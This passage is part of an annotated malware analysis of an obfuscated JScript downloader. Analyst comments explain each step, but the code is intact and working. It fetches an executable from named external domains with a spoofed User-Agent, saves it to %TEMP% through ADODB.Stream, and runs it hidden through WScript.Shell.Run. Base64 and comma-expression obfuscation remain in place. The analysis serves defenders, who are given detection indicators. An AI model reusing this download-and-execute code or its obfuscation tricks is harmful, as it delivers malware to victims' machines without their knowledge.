  415. SayPaymorris_FROG2Richters = "WScript.Shell";
  416.  
  417. The resulting array after the pop() is called:
  418. var doubleTrouble = [
  419. "MSXML2.XMLHTTP",
  420. "WARHORSE"
  421. ];
  422. ****/
/**** implicit global; doubleTrouble.pop() -> "WScript.Shell" ****/
abtest = doubleTrouble[SayPaymorris_FROGcccomeccc + "op"]();
  424.  
  425.  
  426. /****
  427. Substitution:
  428. SayPaymorris_oldBitch = ActiveXObject(abtest);
  429. Simplification:
  430. SayPaymorris_oldBitch = ActiveXObject(WScript.Shell);
  431. ****/
/**** implicit global holding new ActiveXObject("WScript.Shell"); used for ExpandEnvironmentStrings and, at the end, Run ****/
SayPaymorris_oldBitch = mexAO('' + abtest);
  433.  
/**** "s"; implicit global, joined with "end" inside SayPaymorris_ECOPLAT() to spell the method name "send" ****/
SayPaymorris_FROG2tudabilo1 = "s";
  435.  
  436. /****
This calls the Array.prototype.shift() method twice. The first call removes the first element of the array and returns it to become the method called on ActiveXObject(WScript.Shell); the second call returns the next element as the argument for that method invocation. After substitution it looks like the following:
  438. var SayPaymorris_FROG2vulture = ActiveXObject(WScript.Shell).SayPaymorris_FROG2sirdallos(SayPaymorris_FROG2VARDOCF);
  439. Further simplification:
  440. var SayPaymorris_FROG2vulture = ActiveXObject(WScript.Shell).ExpandEnvironmentStrings("%TEMP%");
  441.  
  442. The resulting array after the double shift() is called:
  443. var SayPaymorris_FROG2DoUtra = [
  444. ".exe",
  445. "Run"
  446. ];
  447. ****/
/****
The expanded %TEMP% directory: WScript.Shell.ExpandEnvironmentStrings("%TEMP%"). Both shift() calls happen before the
method runs (left to right), leaving SayPaymorris_FROG2DoUtra as [".exe", "Run"].
****/
var SayPaymorris_FROG2vulture = SayPaymorris_oldBitch[SayPaymorris_FROG2DoUtra.shift()](SayPaymorris_FROG2DoUtra.shift());
  449.  
  450. /****
  451. SayPaymorris_FROG2weasel = "GET";
  452. ****/
/**** "GET" (\x45 is "E"); implicit global used as the HTTP method in open() ****/
SayPaymorris_FROG2weasel = "G\x45T";
  454.  
  455. /****
  456. This calls the Array.prototype.shift() method, removing the first element in the array and returns it.
  457. Substitution:
  458. var SayPaymorris_FROG2SIDRENKOV = ".exe";
  459.  
  460. The resulting array after the shift() is called:
  461. var SayPaymorris_FROG2DoUtra = [
  462. "Run"
  463. ];
  464. ****/
/**** ".exe"; appended to the drop path inside SayPaymorris_ECOPLAT() ****/
var SayPaymorris_FROG2SIDRENKOV = SayPaymorris_FROG2DoUtra.shift();
  466.  
  467.  
  468. /****
  469. This calls the Array.prototype.shift() method, removing the first element in the array and returns it.
  470. The last element has been removed from the SayPaymorris_FROG2DoUtra[] array.
  471. Substitution:
  472. var SayPaymorris_FROG2promises = "Run"
  473.  
  474. The resulting array after the shift() is called:
  475. var SayPaymorris_FROG2DoUtra = [
  476. ];
  477. ****/
/**** "Run"; the WScript.Shell method name used to launch the dropped file ****/
var SayPaymorris_FROG2promises = SayPaymorris_FROG2DoUtra.shift();
  479.  
  480. /****
  481. var SayPaymorris_FROG2OCHENA = "open"
  482. ****/
/**** "open"; the ADODB.Stream method name passed to silaBitsa() ****/
var SayPaymorris_FROG2OCHENA = "b3WARHORSEBlbWARHORSEg==".pineapple();
  484.  
/**** "type"; implicit global naming the ADODB.Stream property set to 1 (binary) below ****/
SayPaymorris_FROG2SPASPI = "type";
  486.  
/****
Zero-argument "call a method by name" helper: invokes R[K]() with R as the receiver and discards the result.
Declared but not called anywhere on this page (silaBitsa, built with new Function, does the same job).
****/
function SayPaymorris_FROG2_aCho(R, K) {
var method = R[K];
method.call(R);
}
  490.  
  491. /****
  492. Calling this function performs the String.prototype.concat() method.
This results in the concatenation of the string "?" with the function-supplied input, followed by "=".
  494. ****/
/****
Builds the query-string fragment "?" + aa + "=" ("\x3F" is "?", "\x3D" is "=").
String.prototype.concat is kept so that non-string arguments are converted exactly as before.
****/
function CNPK(aa) {
var emptyPrefix = "";
return emptyPrefix.concat("\x3F", aa, "\x3D");
}
  498.  
  499. /****
  500. This function is called passing in the URLs that are found belonging to the domains.
  501. Sample input:
  502. SayPaymorris_ECOPLAT("http://adelaidemotorshow.com.au/hg65fyJHG??XXSkRjf=XXSkRjf", XXSkRjf1);
  503. ****/
/****
Analyst note: this is the whole download-and-execute routine. Per call it
 (1) builds the drop path: expanded %TEMP% + "/" + SayPaymorris_FROG2StrokaParam2 + ".exe";
 (2) issues a synchronous GET to SayPaymorris_FROG2gutter on the shared MSXML2.XMLHTTP object, with the
     User-Agent spoofed to MSIE 6.0 / Windows 2000;
 (3) writes ResponseBody into an ADODB.Stream opened in binary mode (type = 1) and saves it with
     saveToFile(path, 2);
 (4) launches the file through WScript.Shell.Run(path, 0, false) - hidden window, no wait.
Any exception anywhere in the try block returns false, so the caller moves on to the next URL; true stops the
caller's loop. If SayPaymorris_FROG2TRUEFALSE is false the function falls off the end and returns undefined.
Behaviours a defender can key on, all visible below: the script host instantiating MSXML2.XMLHTTP and
ADODB.Stream, an .exe written under %TEMP% by the script host, and the script host then spawning that file.
The two commented-out checks after the ResponseBody read (minimum size, and 'M','Z' = 77,90 as the first two
bytes) would have validated the payload as a PE executable; they are disabled.
****/
function SayPaymorris_ECOPLAT(SayPaymorris_FROG2gutter, SayPaymorris_FROG2StrokaParam2) {
try {
/****
var SayPaymorris_FROG2CHICKA = ActiveXObject(WScript.Shell).ExpandEnvironmentStrings("%TEMP%");
****/
var SayPaymorris_FROG2CHICKA = SayPaymorris_FROG2vulture;

/****
The forward slash character is appended onto the %TEMP% path stored in SayPaymorris_FROG2CHICKA.
E.g.
%TEMP%/
****/
SayPaymorris_FROG2CHICKA = SayPaymorris_FROG2CHICKA + silkopil;

/****
The temp file name is going to be appended to the end of the file path stored in SayPaymorris_FROG2CHICKA.
E.g.
%TEMP%/XXSkRjf1
****/
SayPaymorris_FROG2CHICKA = SayPaymorris_FROG2CHICKA + SayPaymorris_FROG2StrokaParam2;

/****
ActiveXObject(MSXML2.XMLHTTP).open("GET", "http://adelaidemotorshow.com.au/hg65fyJHG??XXSkRjf=XXSkRjf", false);

This calls the ActiveXObject method open() passing in the HTTP method to be used, "GET", the absolute or relative URL, "http://adelaidemotorshow.com.au/hg65fyJHG??XXSkRjf=XXSkRjf", and lastly, whether this is an asynchronous operation, false or synchronous.
****/
SayPaymorris_FROGletchikva["open"](SayPaymorris_FROG2weasel, SayPaymorris_FROG2gutter, false);

/****
This will evaluate to true based on what was assigned to SayPaymorris_FROG2TRUEFALSE, earlier on. As a result, we execute this block.
****/
if (SayPaymorris_FROG2TRUEFALSE) {
/****
SayPaymorris_FROG2_cCho(ActiveXObject(MSXML2.XMLHTTP), "setRequestHeader", "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
After the function call the call looks more like this:
ActiveXObject(MSXML2.XMLHTTP).setRequestHeader("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
This sets the user-agent string in the header before the request to the domain is called. This is the same aforementioned user-agent string.
The comma expression yields only its last operand, SayPaymorris_FROGsrq ("RequestHeader"), so the method name is "setRequestHeader".
****/
SayPaymorris_FROG2_cCho(SayPaymorris_FROGletchikva, "set" + (11, "SayPaymorris_scientists", "SayPaymorris_smash", "SayPaymorris_columnists", "SayPaymorris_conscious", "SayPaymorris_worse", "SayPaymorris_dervish", "SayPaymorris_interstate", SayPaymorris_FROGsrq), "User-Agent", "TW96aWxsYS80LjAgWARHORSEKGNvbXBhdGlibGU7IE1TSUUgNi4wOyWARHORSEBXaW5kb3dzIE5UIDUuMCk=".pineapple());
}

/****
Substitution:
SayPaymorris_FROGletchikva[SayPaymorris_FROG2tudabilo1+"end"]();
Simplification:
ActiveXObject(MSXML2.XMLHTTP).send();
Because open() was called with async = false, send() blocks until the response has arrived.
****/
SayPaymorris_FROGletchikva[SayPaymorris_FROG2tudabilo1 + ("SayPaymorris_talkative", "SayPaymorris_squint", "SayPaymorris_episcopal", "SayPaymorris_accrue", "SayPaymorris_keyhole", "end")]();

/****
Substitution (the comma expression yields only its last operand, turkish['BOLGARIN'] = "onseBody"):
var kuzut = SayPaymorris_FROGletchikva["Re" + "sp" + turkish['BOLGARIN']];
Simplification:
var kuzut = ActiveXObject(MSXML2.XMLHTTP).ResponseBody;

This set the variable kuzut to the ResponseBody property of the ActiveXObject, which effectively returns the HTTP response.
****/
var kuzut = SayPaymorris_FROGletchikva["Re" + "sp" + (SayPaymorris_FROG2StrokaParam2, "SayPaymorris_hacker", "SayPaymorris_cartwright", "SayPaymorris_denomination", "SayPaymorris_passively", 1123, turkish['BOLGARIN'])];

/****
These two lines were commented out in the original code. The first would have rejected responses smaller than
29989 bytes; the second checks the first two bytes for 77, 90 ('M', 'Z'), the DOS/PE executable magic.
With both disabled, whatever the server returns is written to disk and run.
****/
//if(kuzut < 29989)return false;
// if (kuzut[0]!= 77 || kuzut[1]!= 90)return false;

/****
This will evaluate to true based on what was assigned to SayPaymorris_FROG2TRUEFALSE, earlier on. As a result, we execute this block.

****/
if (SayPaymorris_FROG2TRUEFALSE) {
/****
var SayPaymorris_FROG2opOpOp = new ActiveXObject(ADODB.Stream);
****/
var SayPaymorris_FROG2opOpOp = new SayPaymorris_FROG2LitoyDISK(Limbus2000());

/****
Variable declared and never used.
****/
SayPaymorris_FROGGaSMa = "Valar10Morgulis";

/****
Re-redeclaration of the function for ease of viewing. dedlyb is never called on this page; its body refers to
x, max, arbiter and seaboard, none of which are declared here, so it is filler.

function dedlyb(n, enc){
newfoundland = Math.floor(n);
if (x < 256*256*256) {
bytes = [max + 2, Math.floor(x / 256 / 256), Math.floor(arbiter / 256) % 256, x % 256 ];
} else if (x < 256*256*256*256) {
flirtation = [max + 3, Math.floor(x / 256 / 256 / 256), Math.floor(x / 256 / 256) % 256, Math.floor(seaboard / 256) % 256, x % 256];
}
}
****/
var dedlyb = new Function("n, enc", " newfoundland = Math.floor(n); if (x < 256*256*256) { bytes = [ max + 2, Math.floor(x / 256 / 256), Math.floor(arbiter / 256) % 256, x % 256 ]; } else if (x < 256*256*256*256) { flirtation = [ max + 3, Math.floor(x / 256 / 256 / 256), Math.floor(x / 256 / 256) % 256, Math.floor(seaboard / 256) % 256, x % 256 ]; }");

/****
Re-redeclaration of the function for ease of viewing.

function silaBitsa(WARHORSE, WARHORSE2) {
WARHORSE[WARHORSE2]();
}
****/
var silaBitsa = new Function("WARHORSE,WARHORSE2", "WARHORSE[WARHORSE2]();");

/****
Re-redeclaration of the function for ease of viewing.

function silaBitsa2(WARHORSE, WARHORSE2) {
WARHORSE.write(WARHORSE2);
}
****/
var silaBitsa2 = new Function("WARHORSE,WARHORSE2", "WARHORSE.write(WARHORSE2);");

/****
silaBitsa(ActiveXObject(ADODB.Stream), "open");

After the call to the function silaBitsa(), the result becomes:
ActiveXObject(ADODB.Stream).open();
****/
silaBitsa(SayPaymorris_FROG2opOpOp, SayPaymorris_FROG2OCHENA);

/****
ActiveXObject(ADODB.Stream).type = 1;
The ADO Stream Type property sets the StreamTypeEnum value; which passing in 1 indicates the data is to be stored as binary data.
****/
SayPaymorris_FROG2opOpOp[SayPaymorris_FROG2SPASPI] = SayPaymorris_FROG2chosen;

/****
silaBitsa2(ActiveXObject(ADODB.Stream), ActiveXObject(MSXML2.XMLHTTP).ResponseBody);

After the call to the function silaBitsa2(), the result becomes:
ActiveXObject(ADODB.Stream).write(ActiveXObject(MSXML2.XMLHTTP).Responsebody);
****/
silaBitsa2(SayPaymorris_FROG2opOpOp, kuzut);

/****
Variable declared and never used.
****/
SayPaymorris_FROG2XWaxeQhw = "Valar11Morgulis";

/****
ActiveXObject(ADODB.Stream).position = 0;
The ADO Stream Position property sets the Long value of the offset from the beginning of the stream to 0.
****/
SayPaymorris_FROG2opOpOp["position"] = 0;

/****
Variable declared and never used.
****/
SayPaymorris_FROG2krDwvrh = "Valar12Morgulis";

/****
This will append to the SayPaymorris_FROG2CHICKA variable the .exe string.

The resulting file path location looks something like this:
%TEMP%/XXSkRjf1 + ".exe"
****/
SayPaymorris_FROG2CHICKA = SayPaymorris_FROG2CHICKA + SayPaymorris_FROG2SIDRENKOV;

/****
SayPaymorris_FROG2opOpOp.saveToFile(SayPaymorris_FROG2CHICKA, 26/13);

ActiveXObject(ADODB.Stream).saveToFile("%TEMP%/XXSkRjf1.exe", 2);

This calls the ADO.saveToFile() method to save the binary contents of a Stream to a file.
"cWARHORSE2F2WARHORSEZVWARHORSERvRmlsZQ==" decodes to "saveToFile"; 26 / 13 = 2 = adSaveCreateOverWrite, so an existing file of the same name is replaced.
****/
SayPaymorris_FROG2opOpOp["cWARHORSE2F2WARHORSEZVWARHORSERvRmlsZQ==".pineapple()](SayPaymorris_FROG2CHICKA, 26 / 13);

/****
Variable declared and never used.
****/
SayPaymorris_FROG2SswQdi = "Valar13Morgulis";

/****
ActiveXObject(ADODB.Stream).close();

This calls the ADO.close() method to close any ADO objects and their dependents.
****/
SayPaymorris_FROG2opOpOp.close();

/****
ActiveXObject(WScript.Shell).Run("%TEMP%/XXSkRjf1.exe", 0, false);

This calls the Run() method for the WScript.Shell Object passing in the file path name "%TEMP%/XXSkRjf1.exe", the Window Style of 0 indicating to hide the window, and the WaitOnReturn value to false to prevent the WScript from waiting for the program to finish execution.
****/
SayPaymorris_oldBitch[SayPaymorris_FROG2promises](SayPaymorris_FROG2CHICKA, 0, false);

/****
This is our stopping condition of the for-loop used to call this function.
****/
return true;
}
} catch (exception2) {
/**** any failure (network, COM, file system) is swallowed; false lets the caller try the next URL ****/
return false;
}
};
  699.  
  700. /****
  701. SayPaymorris_SayNoNo contains the string "WARHORSE"; which when run through the pineapple() method returns an empty string.
  702. This essentially becomes, eval();
  703. ****/
/**** eval("") - "WARHORSE" decodes to the empty string, so this executes nothing ****/
eval(SayPaymorris_SayNoNo.pineapple());
  705.  
  706. /****
  707. The variable SayPaymorrisFPADRML is an empty string.
  708. Call to this function will perform eval(), again.
  709. ****/
/**** eval("") through the wrapper; SayPaymorrisFPADRML is the empty string, so again nothing runs ****/
SayPaymorrisFPADZO_ZO(SayPaymorrisFPADRML);
  711.  
/**** drop-file counter; it is incremented before its first use in the loop below, so the first file stem is "XXSkRjf2" ****/
var SayPaymorris_FROGodnoklassYO = 1;
  713.  
  714. /****
  715. var SayPaymorris_FROG2_a5 = "WARHORSEYWRlbGFpZGVtb3RvcnNob3cuY29tLmF1L2hnWARHORSENjVmeUpIRz8=ZZZWARHORSEdHJvbWJvc2l0dGluZy5vcmcvYWYvaGc2NWZ5SkhHZZZWARHORSE".split("ZZZ");
  716.  
  717. var SayPaymorris_FROG2_a5 = ["WARHORSEYWRlbGFpZGVtb3RvcnNob3cuY29tLmF1L2hnWARHORSENjVmeUpIRz8=", "WARHORSEdHJvbWJvc2l0dGluZy5vcmcvYWYvaGc2NWZ5SkhH", "WARHORSE"];
  718. After decoding:
  719. var SayPaymorris_FROG2_a5 = ["adelaidemotorshow.com.au/hg65fyJHG?", "trombositting.org/af/hg65fyJHG", ""];
  720. ****/
/****
Three base64 host/path entries separated by "ZZZ"; still encoded here, each one is decoded by WARHORSE500() when
its URL is built. The third entry is "WARHORSE" alone, which decodes to "" (an empty host).
****/
var SayPaymorris_FROG2_a5 = ('WARHORSEYWRlbGFpZGVtb3RvcnNob3cuY29tLmF1L2hnWARHORSENjVmeUpIRz8=ZZZ' + 'WARHORSEdHJvbWJvc2l0dGluZy5vcmcvYWYvaGc2NWZ5SkhH' + 'ZZZWARHORSE').split("ZZZ");
  722.  
  723. /****
  724. This function, when called, prepends "http://" to the item at index SayPaymorris_FROG2HORDA5 of array SayPaymorris_FROG2_a5 after base64 decoding.
  725.  
  726. Re-redeclaration of the function for ease of viewing.
  727.  
  728. function WARHORSE500(SayPaymorris_FROG2_a5, SayPaymorris_FROG2HORDA5) {
  729. return SayPaymorris_FROG2_bChosteck.pineapple() + SayPaymorris_FROG2_a5[SayPaymorris_FROG2HORDA5].pineapple();
  730. }
  731. ****/
/**** URL builder via new Function: "http://" (SayPaymorris_FROG2_bChosteck decoded) + decoded entry at the given index ****/
var WARHORSE500 = new Function("SayPaymorris_FROG2_a5,SayPaymorris_FROG2HORDA5", 'return SayPaymorris_FROG2_bChosteck.pineapple() + SayPaymorris_FROG2_a5[SayPaymorris_FROG2HORDA5].pineapple();');
  733.  
/****
Main loop. for...in over the array yields its index keys as strings ("0", "1", "2"); SayPaymorris_FROG2HORDA5 is an
implicit global. The counter is incremented before each call, so the dropped-file stems are "XXSkRjf2", "XXSkRjf3"
and "XXSkRjf4". The loop ends at the first URL for which SayPaymorris_ECOPLAT() returns true.
****/
for (SayPaymorris_FROG2HORDA5 in SayPaymorris_FROG2_a5) {
SayPaymorris_FROGodnoklassYO++;

/****
Call to function SayPaymorris_ECOPLAT(). The calls are processed in order, seen below, and for-loop execution stops if the function call returns true (i.e. successful call to the remote servers).
First call, SayPaymorris_ECOPLAT("http://adelaidemotorshow.com.au/hg65fyJHG??XXSkRjf=XXSkRjf", "XXSkRjf2");
Second call, SayPaymorris_ECOPLAT("http://trombositting.org/af/hg65fyJHG?XXSkRjf=XXSkRjf", "XXSkRjf3");
Third call (empty third entry), SayPaymorris_ECOPLAT("http://?XXSkRjf=XXSkRjf", "XXSkRjf4").
****/
if (SayPaymorris_ECOPLAT(WARHORSE500(SayPaymorris_FROG2_a5, SayPaymorris_FROG2HORDA5) + CNPK(SayPaymorris_FROGodnoklass) + SayPaymorris_FROGodnoklass, SayPaymorris_FROGodnoklass + SayPaymorris_FROGodnoklassYO)) {
break;
}
}